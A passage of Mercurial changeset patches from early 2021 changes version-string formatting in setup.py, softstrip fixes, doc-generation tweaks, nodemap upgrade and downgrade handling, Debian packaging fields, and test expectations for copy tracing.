hopefully save someone some time I spent at least an hour, probably closer to 1.5, trying to figure out what this was complaining about. Hopefully anyone else in my position will see this note and not waste the time. Differential Revision: https://phab.mercurial-scm.org/D9953 diff --git a/tests/test-check-module-imports.t b/tests/test-check-module-imports.t --- a/tests/test-check-module-imports.t +++ b/tests/test-check-module-imports.t @@ -14,6 +14,10 @@ Known-bad files are excluded by -X as some of them would produce unstable outputs, which should be fixed later. +NOTE: the `hg locate` command here only works on files that are known to +Mercurial. If you add an import of a new file and haven't yet `hg add`ed it, you +will likely receive warnings about a direct import. + $ testrepohg locate 'set:**.py or grep(r"^#!.*?python")' \ > 'tests/**.t' \ > -X hgweb.cgi \ # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1612476702 -3600 # Thu Feb 04 23:11:42 2021 +0100 # Node ID 866eb4d6bd9f305e73a3439af6faa0af66dfebe5 # Parent 02d91167cfc3f3cf57589d6b4356f3869d10f1e9 build: fake PEP440 versions If the current version is not exactly a tag, use a local version specifier to fix it up. PEP 440 uses the "+" separator and only allows alphanumeric and dot, so use dot for further separations. 
Old devel build: 5.7+155-a163cc36d06b New devel build: 5.7+hg155.a163cc36d06b Differential Revision: https://phab.mercurial-scm.org/D9955 diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -419,9 +419,9 @@ ltag = sysstr(hg.run(ltagcmd)) changessincecmd = ['log', '-T', 'x\n', '-r', "only(.,'%s')" % ltag] changessince = len(hg.run(changessincecmd).splitlines()) - version = '%s+%s-%s' % (ltag, changessince, hgid) + version = '%s+hg%s.%s' % (ltag, changessince, hgid) if version.endswith('+'): - version += time.strftime('%Y%m%d') + version = version[:-1] + 'local' + time.strftime('%Y%m%d') elif os.path.exists('.hg_archival.txt'): kw = dict( [[t.strip() for t in l.split(':', 1)] for l in open('.hg_archival.txt')] @@ -430,11 +430,13 @@ version = kw['tag'] elif 'latesttag' in kw: if 'changessincelatesttag' in kw: - version = '%(latesttag)s+%(changessincelatesttag)s-%(node).12s' % kw + version = ( + '%(latesttag)s+.%(changessincelatesttag)s.%(node).12s' % kw + ) else: - version = '%(latesttag)s+%(latesttagdistance)s-%(node).12s' % kw + version = '%(latesttag)s+.%(latesttagdistance)s.%(node).12s' % kw else: - version = kw.get('node', '')[:12] + version = '0+' + kw.get('node', '')[:12] if version: versionb = version @@ -451,20 +453,6 @@ ), ) -try: - oldpolicy = os.environ.get('HGMODULEPOLICY', None) - os.environ['HGMODULEPOLICY'] = 'py' - from mercurial import __version__ - - version = __version__.version -except ImportError: - version = b'unknown' -finally: - if oldpolicy is None: - del os.environ['HGMODULEPOLICY'] - else: - os.environ['HGMODULEPOLICY'] = oldpolicy - class hgbuild(build): # Insert hgbuildmo first so that files in mercurial/locale/ are found @@ -1683,8 +1671,8 @@ # unicode on Python 2 still works because it won't contain any # non-ascii bytes and will be implicitly converted back to bytes # when operated on. 
-assert isinstance(version, bytes) -setupversion = version.decode('ascii') +assert isinstance(version, str) +setupversion = version extra = {} # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613130688 -3600 # Fri Feb 12 12:51:28 2021 +0100 # Node ID c3c7a86e9c24f5ee218d6dfa15fe8b912325471a # Parent 866eb4d6bd9f305e73a3439af6faa0af66dfebe5 tests: fix differing output between py2 and py3 db9e33beb0fb broke the tests because of the difference in bytestring repr between py2 and py3. Rather than backout that change for so little, I figured I'd fix it myself. Hopefully Python 2 supports gets dropped very soon. Differential Revision: https://phab.mercurial-scm.org/D9987 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -685,7 +685,7 @@ # We failed to resolve a parent for this node, so # we crash the changegroup construction. raise error.Abort( - b'unable to resolve parent while packing %r %r' + b"unable to resolve parent while packing '%s' %r" b' for changeset %r' % (store.indexfile, rev, clrev) ) diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -147,7 +147,7 @@ $ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0 $ cd narrow2 $ hg pull -q -r 1 - remote: abort: unexpected error: unable to resolve parent while packing b'00manifest.i' 1 for changeset 0 + remote: abort: unexpected error: unable to resolve parent while packing '00manifest.i' 1 for changeset 0 transaction abort! 
rollback completed abort: pull failed on remote # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612979148 28800 # Wed Feb 10 09:45:48 2021 -0800 # Node ID beaa233e81f7d05560b0ba454f1315fab722de26 # Parent c3c7a86e9c24f5ee218d6dfa15fe8b912325471a softstrip: move _bookmarkmovements() call to where it's needed The call to `_bookmarkmovements()` is unrelated to the backup, so let's move it after. Differential Revision: https://phab.mercurial-scm.org/D9984 diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -308,11 +308,11 @@ if not tostrip: return None - newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) if backup: node = tostrip[0] backupfile = _createstripbackup(repo, tostrip, node, topic) + newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) with repo.transaction(b'strip') as tr: phases.retractboundary(repo, tr, phases.archived, tostrip) bmchanges = [(m, repo[newbmtarget].node()) for m in updatebm] # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612979390 28800 # Wed Feb 10 09:49:50 2021 -0800 # Node ID cd91543431604b0fcaa601a3aa8b3c862f0d7c41 # Parent beaa233e81f7d05560b0ba454f1315fab722de26 softstrip: fix a reference to an undefined variable `backupfile` wasn't defined if no backup was requested. Let's set it to `None` by default, which matches what regular `repair.strip()` does. 
Differential Revision: https://phab.mercurial-scm.org/D9985 diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -308,6 +308,7 @@ if not tostrip: return None + backupfile = None if backup: node = tostrip[0] backupfile = _createstripbackup(repo, tostrip, node, topic) # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613156643 28800 # Fri Feb 12 11:04:03 2021 -0800 # Node ID 921e1253c8ba97827e68fd98d2791978324d7dc6 # Parent cd91543431604b0fcaa601a3aa8b3c862f0d7c41 gendoc: support defaults on customopts a bit better Without this, a customopt will very likely render like this: ``` -foo does foo (default: <hgext.myextension.MyOpt object at 0x7f31...>) ``` I copied this logic from how this is handled in mercurial/help.py. Differential Revision: https://phab.mercurial-scm.org/D9988 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -31,6 +31,7 @@ commands, encoding, extensions, + fancyopts, help, minirst, pycompat, @@ -86,6 +87,8 @@ if b'\n' in desc: # only remove line breaks and indentation desc = b' '.join(l.lstrip() for l in desc.split(b'\n')) + if isinstance(default, fancyopts.customopt): + default = default.getdefaultvalue() if default: default = stringutil.forcebytestr(default) desc += _(b" (default: %s)") % default # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613156816 28800 # Fri Feb 12 11:06:56 2021 -0800 # Node ID eb36f7a71291de88e0ee12cebdd574d026fce2dc # Parent 921e1253c8ba97827e68fd98d2791978324d7dc6 gendoc: add support for loading extensions from config settings We manage our installation and ship some extensions, enabled by default for our users, that are in hgext3rd or other directories not scanned by this tool by default. We want to generate docs during the build process, and having those docs include the extensions that users don't have to manually enable is desirable. 
This is *not* desirable for the normal build process, however, and should never be enabled by default. Differential Revision: https://phab.mercurial-scm.org/D9989 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -330,6 +330,11 @@ doc = encoding.strtolocal(sys.argv[1]) ui = uimod.ui.load() + # Trigger extensions to load. This is disabled by default because it uses + # the current user's configuration, which is often not what is wanted. + if encoding.environ.get(b'GENDOC_LOAD_CONFIGURED_EXTENSIONS', b'0') != b'0': + extensions.loadall(ui) + if doc == b'hg.1.gendoc': showdoc(ui) else: # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613165223 28800 # Fri Feb 12 13:27:03 2021 -0800 # Node ID 85ec89c47a0413a0cbd54062527e33555f45dec3 # Parent eb36f7a71291de88e0ee12cebdd574d026fce2dc gendoc: use an empty comment so aliases are separated from previous elements For commands like `hg bookmarks`, where there's no `[+] marked option can be specified multiple times`, this causes the final option in the option list to not be the parent of the aliases definition. The aliases section is thus marked as a blockquote like on commands that do have text separating the option list and the aliases definition. Differential Revision: https://phab.mercurial-scm.org/D9990 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -317,7 +317,12 @@ ui.write(b"\n") # aliases if d[b'aliases']: - ui.write(_(b" aliases: %s\n\n") % b" ".join(d[b'aliases'])) + # Note the empty comment, this is required to separate this + # (which should be a blockquote) from any preceding things (such + # as a definition list). 
+ ui.write( + _(b"..\n\n aliases: %s\n\n") % b" ".join(d[b'aliases']) + ) def allextensionnames(): # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613120028 -3600 # Fri Feb 12 09:53:48 2021 +0100 # Node ID 83ac7c91e17283c1fe9d455793837bbef8bc4ccd # Parent 85ec89c47a0413a0cbd54062527e33555f45dec3 bundle2: pass the operation source down to the changegroup This is currently not used by anything in core (and redundant with the url), the real source information is much more useful. This is going to be used in sidedata exchange patches coming soon. Differential Revision: https://phab.mercurial-scm.org/D9986 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2001,7 +2001,7 @@ op, cg, tr, - b'bundle2', + op.source, b'bundle2', expectedtotal=nbchangesets, **extrakwargs @@ -2083,7 +2083,7 @@ raise error.Abort( _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) ) - ret = _processchangegroup(op, cg, tr, b'bundle2', b'bundle2') + ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: # This is definitely not the final form of this # return. But one need to start somewhere. # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613071373 28800 # Thu Feb 11 11:22:53 2021 -0800 # Node ID c82d6363bc9e3053df3ae42ab400d86afbcd2cd1 # Parent 83ac7c91e17283c1fe9d455793837bbef8bc4ccd packaging: add Provides: python3-mercurial and Homepage to debian package There are other packages that depend on python3-mercurial, like debian's mercurial-git, so we should mark ourselves as providing it. I compared the control file we generate to the one that the debian maintainers generate, and noticed several differences: - the Homepage bit. 
I included this, because why not - a more robust Suggests list that includes a graphical merge tool - a more robust Breaks list - debian's Recommends openssh-client, we only Recommends ca-certificates - a split into `mercurial` and `mercurial-common` (and possibly others?) - a slightly different description Differential Revision: https://phab.mercurial-scm.org/D9983 diff --git a/contrib/packaging/debian/control b/contrib/packaging/debian/control --- a/contrib/packaging/debian/control +++ b/contrib/packaging/debian/control @@ -25,7 +25,9 @@ Suggests: wish Replaces: mercurial-common Breaks: mercurial-common +Provides: python3-mercurial Architecture: any +Homepage: https://www.mercurial-scm.org/ Description: fast, easy to use, distributed revision control tool. Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614112012 28800 # Tue Feb 23 12:26:52 2021 -0800 # Node ID 359bdd8fc60abf8c55cd3c3b6b67208eb76c4f2e # Parent c82d6363bc9e3053df3ae42ab400d86afbcd2cd1 build: make version from .hg_archival.txt consistent with that from .hg/ D9955 changed the version format to replace "-" by "." and to add "hg" before the number representing the distance from the latest tag. However, it missed the "hg" string and added an extra "." to the version string we produce when there's a `.hg_archival.txt`. This patch makes it consistent. 
Differential Revision: https://phab.mercurial-scm.org/D10060 diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -431,12 +431,12 @@ elif 'latesttag' in kw: if 'changessincelatesttag' in kw: version = ( - '%(latesttag)s+.%(changessincelatesttag)s.%(node).12s' % kw + '%(latesttag)s+hg%(changessincelatesttag)s.%(node).12s' % kw ) else: - version = '%(latesttag)s+.%(latesttagdistance)s.%(node).12s' % kw + version = '%(latesttag)s+hg%(latesttagdistance)s.%(node).12s' % kw else: - version = '0+' + kw.get('node', '')[:12] + version = '0+hg' + kw.get('node', '')[:12] if version: versionb = version # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614112181 28800 # Tue Feb 23 12:29:41 2021 -0800 # Node ID e3f23814bac7324a457f5b231de3c8234c62503a # Parent 359bdd8fc60abf8c55cd3c3b6b67208eb76c4f2e windows: fix parsing of version number to match format from D9955 Differential Revision: https://phab.mercurial-scm.org/D10061 diff --git a/contrib/packaging/hgpackaging/util.py b/contrib/packaging/hgpackaging/util.py --- a/contrib/packaging/hgpackaging/util.py +++ b/contrib/packaging/hgpackaging/util.py @@ -161,10 +161,10 @@ >>> normalize_windows_version("5.3rc1") '5.3.0.1' - >>> normalize_windows_version("5.3rc1+2-abcdef") + >>> normalize_windows_version("5.3rc1+hg2.abcdef") '5.3.0.1' - >>> normalize_windows_version("5.3+2-abcdef") + >>> normalize_windows_version("5.3+hg2.abcdef") '5.3.0.2' """ if '+' in version: @@ -188,8 +188,8 @@ if rc is not None: versions.append(rc) elif extra: - # <commit count>-<hash>+<date> - versions.append(int(extra.split('-')[0])) + # hg<commit count>.<hash>+<date> + versions.append(int(extra.split('.')[0][2:])) return '.'.join('%d' % x for x in versions[0:4]) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613382200 -19800 # Mon Feb 15 15:13:20 2021 +0530 # Node ID 636853347e14129738393fd0b88e0c769fc3076f # Parent e3f23814bac7324a457f5b231de3c8234c62503a upgrade: write nodemap for 
manifests too In 98e39f04d60e I assumed that writing nodemap for manifests was not desirable and stopped writing it during upgrade. However in recent discussion with Pierre-Yves, I learnt that that's not true. Differential Revision: https://phab.mercurial-scm.org/D9991 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -468,6 +468,13 @@ unfi = srcrepo.unfiltered() cl = unfi.changelog nodemap.persist_nodemap(tr, cl, force=True) + # we want to directly operate on the underlying revlog to force + # create a nodemap file. This is fine since this is upgrade code + # and it heavily relies on repository being revlog based + # hence accessing private attributes can be justified + nodemap.persist_nodemap( + tr, unfi.manifestlog._rootstore._revlog, force=True + ) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) else: with dstrepo.transaction(b'upgrade') as tr: diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -641,6 +641,8 @@ $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n + 00manifest-*.nd (glob) + 00manifest.n $ hg debugnodemap --metadata uid: * (glob) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612957114 -19800 # Wed Feb 10 17:08:34 2021 +0530 # Node ID 67b5fafd3a464b1876fb5bb3b87b200beb7d8cdb # Parent 636853347e14129738393fd0b88e0c769fc3076f upgrade: speed up when we have only nodemap to downgrade Similar to what we do on upgrade, if we have only persistent-nodemap to downgrade we will just delete the nodemap files and update repository requirements instead of processing all the revlogs. After downgrade, we are left with unrequired docket and transaction files which seems fine but can work on deleting them if someone feels we should. 
Differential Revision: https://phab.mercurial-scm.org/D9992 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -128,6 +128,14 @@ notr._postclose[k](None) +def delete_nodemap(tr, repo, revlog): + """ Delete nodemap data on disk for a given revlog""" + if revlog.nodemap_file is None: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) + repo.svfs.unlink(revlog.nodemap_file) + + def persist_nodemap(tr, revlog, pending=False, force=False): """Write nodemap data on disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -476,6 +476,27 @@ tr, unfi.manifestlog._rootstore._revlog, force=True ) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + elif ( + len(upgrade_op.removed_actions) == 1 + and [ + x + for x in upgrade_op.removed_actions + if x.name == b'persistent-nodemap' + ] + and not upgrade_op.upgrade_actions + ): + ui.status( + _(b'downgrading repository to not use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + nodemap.delete_nodemap(tr, srcrepo, cl) + # check comment 20 lines above for accessing private attributes + nodemap.delete_nodemap( + tr, srcrepo, unfi.manifestlog._rootstore._revlog + ) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) else: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -581,7 +581,7 @@ plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default - $ hg debugupgraderepo 
--run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements @@ -593,8 +593,17 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + downgrading repository to not use persistent nodemap feature + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' - [1] + 00changelog-*.nd (glob) + 00manifest-*.nd (glob) + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata @@ -643,6 +652,8 @@ 00changelog.n 00manifest-*.nd (glob) 00manifest.n + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata uid: * (glob) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607606736 -3600 # Thu Dec 10 14:25:36 2020 +0100 # Node ID 018d622e814df4fbcf3de589b7195788f5c226c3 # Parent 67b5fafd3a464b1876fb5bb3b87b200beb7d8cdb test-copies: reinstall initial identical (empty) files for chained copied This effectively back out changeset deeb215be337. Changeset deeb215be33 does not really include a justification for its change and make mes uncomfortable. I have been thinking about it and they are two options: - either having empty/full files does not make a difference, and deeb215be337 is a gratuitous changes. - either having empty/full files do make a difference and deeb215be33 silently change the test coverage. 
In such a situation, if we want the "not empty" case to be tested, we should add new cases to cover it. In practice, we know that the "file content did not change, but merge still needs to create a new filenode" case exists (for example if merging results in similar content but both parents of the file need to be recorded), and that such cases are easy to miss/mess-up in the tests. Having all the files use the same (empty) content was done on purpose to increase the coverage of such corner cases. As a result I am reinstalling the previous test situation. To increase the coverage of some cases involving content-merge in test-copies-chain-merge.t, we will add new, dedicated, cases later in this series, once various cleanups and test improvements have been set in place. This changeset starts with reinstalling the previous situation as (1) it is more fragile, so I am more confident getting it back in the initial situation, (2) I have specific tests further down the line that are based on these ones. The next changeset will slightly alter the test to use non-empty files for these tests (with identical content). It should help to make the initial intent "merge file with identical content" clearer. I am still using a two-step (backout, then change content) approach to facilitate careful validation of the output change. Doing so has a large impact on the output of the "copy info in changeset extra" variant added in 5e72827dae1e (2 changesets after deeb215be33). It seems to highlight various breakages when merges without content change are involved; this is a good example of why we want to explicitly test these cases, because the differences -do- matter a lot. Fixing the "copy info in changeset extra" variant is not a priority here, because (1) this changeset does not break anything, it only highlights that they were always broken, and (2) the only people using "copy info in changeset extra" do not have merges. 
Differential Revision: https://phab.mercurial-scm.org/D9587 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -50,9 +50,7 @@ Add some linear rename initialy - $ echo a > a - $ echo b > b - $ echo h > h + $ touch a b h $ hg ci -Am 'i-0 initial commit: a b h' adding a adding b @@ -302,16 +300,17 @@ $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ hg merge 'desc("e-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mAEm-0 simple merge - one way' $ hg up 'desc("e-2")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 'desc("a-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mEAm-0 simple merge - the other way' created new head @@ -349,15 +348,16 @@ $ hg commit -m "f-2: rename i -> d" $ hg debugindex d rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) + 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) + 0 2 b80de5d13875 000000000000 000000000000 (changeset !) 
1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mBFm-0 simple merge - one way' $ hg up 'desc("f-2")' @@ -394,7 +394,8 @@ consider history and rename on both branch of the merge. $ hg up 'desc("i-2")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ echo "some update" >> d $ hg commit -m "g-1: update d" created new head @@ -448,16 +449,19 @@ $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' --tool :union - merging d - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) 
(branch merge, don't forget to commit) $ hg ci -m 'mFGm-0 simple merge - one way' created new head $ hg up 'desc("g-1")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' --tool :union - merging d - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mGFm-0 simple merge - the other way' created new head @@ -1120,15 +1124,15 @@ $ hg manifest --debug --rev 'desc("d-2")' | grep '644 d' b004912a8510032a0350a74daa2803dadfb00e12 644 d $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' - 169be882533bc917905d46c0c951aa9a1e288dcf 644 d (no-changeset !) - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 d (changeset !) + 01c2f5eabdc4ce2bdee42b5f86311955e6c8f573 644 d (no-changeset !) + b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) $ hg debugindex d | head -n 4 rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) + 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) + 0 2 b80de5d13875 000000000000 000000000000 (changeset !) 1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) + 2 25 68d5bca9df05 b80de5d13875 000000000000 (changeset !) 
Log output should not include a merge commit as it did not happen @@ -1179,34 +1183,30 @@ #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - c39c6083dad048d5138618a46f123e2f397f4f18 644 f + eb806e34ef6be4c264effd5933d31004ad15a793 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - a9a8bc3860c9d8fa5f2f7e6ea8d40498322737fd 644 f + eb806e34ef6be4c264effd5933d31004ad15a793 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - 263ea25e220aaeb7b9bac551c702037849aa75e8 644 f + 0dd616bc7ab1a111921d95d76f69cda5c2ac539c 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 71b9b7e73d973572ade6dd765477fcee6890e8b1 644 f + 6da5a2eecb9c833f830b67a4972366d49a9a142c 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 263ea25e220a 000000000000 000000000000 - 1 10 71b9b7e73d97 000000000000 000000000000 - 2 19 c39c6083dad0 263ea25e220a 71b9b7e73d97 - 3 20 a9a8bc3860c9 71b9b7e73d97 263ea25e220a + 0 4 0dd616bc7ab1 000000000000 000000000000 + 1 10 6da5a2eecb9c 000000000000 000000000000 + 2 19 eb806e34ef6b 0dd616bc7ab1 6da5a2eecb9c #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - 498e8799f49f9da1ca06bb2d6d4accf165c5b572 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - c5b506a7118667a38a9c9348a1f63b679e382f57 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 1e88685f5ddec574a34c70af492f95b6debc8741 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 b789fdd96dc2 000000000000 000000000000 - 1 10 1e88685f5dde 000000000000 000000000000 - 2 19 498e8799f49f b789fdd96dc2 1e88685f5dde - 3 20 c5b506a71186 1e88685f5dde b789fdd96dc2 + 0 4 b80de5d13875 000000000000 000000000000 
#endif # Here the filelog based implementation is not looking at the rename @@ -1214,20 +1214,20 @@ # based on works fine. We have different output. $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAEm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEAm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAEm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEAm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' A f @@ -1312,26 +1312,26 @@ R a R h $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBFm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBFm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) R i $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFBm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFBm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFBm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) 
